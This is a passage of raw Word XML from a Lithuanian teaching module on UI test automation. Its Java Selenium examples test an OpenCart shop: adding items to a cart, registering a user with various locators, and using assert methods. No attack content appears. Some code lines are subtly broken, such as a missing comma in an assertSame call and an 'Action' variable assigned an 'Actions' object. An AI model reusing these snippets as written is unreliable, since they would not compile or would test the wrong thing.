                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.quit();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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2" w:name="_Toc14392784"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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3" w:name="_Toc14392785"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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4" w:name="_Toc14392786"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void testAddProductToCart() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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5" w:name="_Toc14392787"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("http://localhost/opencart/upload/");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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6" w:name="_Toc14392788"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.manage().window().setSize(new Dimension(1200, 833));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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7" w:name="_Toc14392789"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("Mac (1)")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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8" w:name="_Toc14392790"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector("button &gt; .d-none")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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599" w:name="_Toc14392791"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>js.executeScript("window.scrollTo(0,10)");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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0" w:name="_Toc14392792"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("Phones &amp; PDAs")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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1" w:name="_Toc14392793"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector(".product-layout:nth-child(2) .d-none")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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2" w:name="_Toc14392794"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector(".list-inline-item:nth-child(4) .d-none")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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3" w:name="_Toc14392795"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.linkText("iPhone")).getText(), is("iPhone"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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4" w:name="_Toc14392796"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.linkText("iMac")).getText(), is("iMac"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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5" w:name="_Toc14392797"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>assertThat(driver.findElement(By.cssSelector(".col-md-4 &gt; .table tr:nth-child(4) &gt; .text-right:nth-child(2)")).getText(), is("192.38€"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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6" w:name="_Toc14392798"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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7" w:name="_Toc14392799"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.cssSelector("tr:nth-child(1) &gt; .text-left .btn-danger"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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8" w:name="_Toc14392800"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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09" w:name="_Toc14392801"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="60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0" w:name="_Toc14392802"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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1" w:name="_Toc14392803"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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2" w:name="_Toc14392804"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebElement element = driver.findElement(By.tagName("body"));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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3" w:name="_Toc14392805"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Action builder = new Actions(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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4" w:name="_Toc14392806"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>builder.moveToElement(element, 0, 0).perform();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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5" w:name="_Toc14392807"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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6" w:name="_Toc14392808"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector("tr:nth-child(1) &gt; .text-left .btn-danger &gt; .fas")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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7" w:name="_Toc14392809"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector(".fa-times-circle")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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8" w:name="_Toc14392810"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("Continue")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61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19" w:name="_Toc14392811"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="619"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="620" w:name="_Toc14392812"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="620"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00613F03" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidR="003F45F0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E07CCB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti vartotojo sąsajos automatinius testus naudojant programavimo kalbą ir testavimo karkasą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1353"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00DB0EEC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKATORIŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="006525E7">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>avyzdys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C49F8" w:rsidRPr="00AD4464" w:rsidRDefault="007C49F8"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621" w:name="_Toc14392813"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void registerNewUser(){</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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2" w:name="_Toc14392814"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.setProperty("webdriver.chrome.driver", "/usr/local/bin/chromedriver");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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3" w:name="_Toc14392815"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>WebDriver driver = new ChromeDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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4" w:name="_Toc14392816"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("http://vps351.minehost.lt/new/");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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5" w:name="_Toc14392817"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.linkText("My Account")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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6" w:name="_Toc14392818"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.partialLinkText("Regist")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="626"/>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7" w:name="_Toc14392819"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("input-firstname")).sendKeys("First Name");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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8" w:name="_Toc14392820"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.name("lastname")).sendKeys("Last Name");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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29" w:name="_Toc14392821"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("input-email")).sendKeys(randomString() + "@email.email");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="62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0" w:name="_Toc14392822"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.name("telephone")).sendKeys("123456789");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="630"/>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1" w:name="_Toc14392823"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("input-password")).sendKeys("password123");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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2" w:name="_Toc14392824"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.name("confirm")).sendKeys("password123");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="632"/>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3" w:name="_Toc14392825"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>int totalInputCount = driver.findElements(By.tagName("input")).size();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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4" w:name="_Toc14392826"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("Count of input fields present: " + totalInputCount);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="634"/>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5" w:name="_Toc14392827"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>int classCount = driver.findElements(By.className("form-control")).size();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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6" w:name="_Toc14392828"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("Count of elements with specified class attribute: " + classCount);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="636"/>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7" w:name="_Toc14392829"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.xpath("//input[@type='checkbox' and @name='agree']")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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8" w:name="_Toc14392830"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.cssSelector("input[value='Continue']")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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39" w:name="_Toc14392831"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.xpath("//a[text()='Continue']")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63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0" w:name="_Toc14392832"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="640"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:bookmarkStart w:id="641" w:name="_Toc14392833"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="641"/>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CE0414" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ASSERT METODŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="006F5BAF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0085729D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="006F5BAF">
        <w:t>avyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>public static void main(String[] args) {</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WebDriver driver = new ChromeDriver();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        driver.manage().window().maximize();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        driver.manage().timeouts().implicitlyWait(10, TimeUnit.SECONDS);</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driver.get("http:website link");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        driver.findElement(By.id("wishlist-total")).click();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        Assert.assertSame("Number of Search Box/es:", 1 driver.findElements(By.id("search")).size());</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WebElement emailElement = driver.findElement(By.id("input-email"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        String email = "email@email.com";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        emailElement.sendKeys(email);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        emailElement.clear();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        emailElement.submit();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
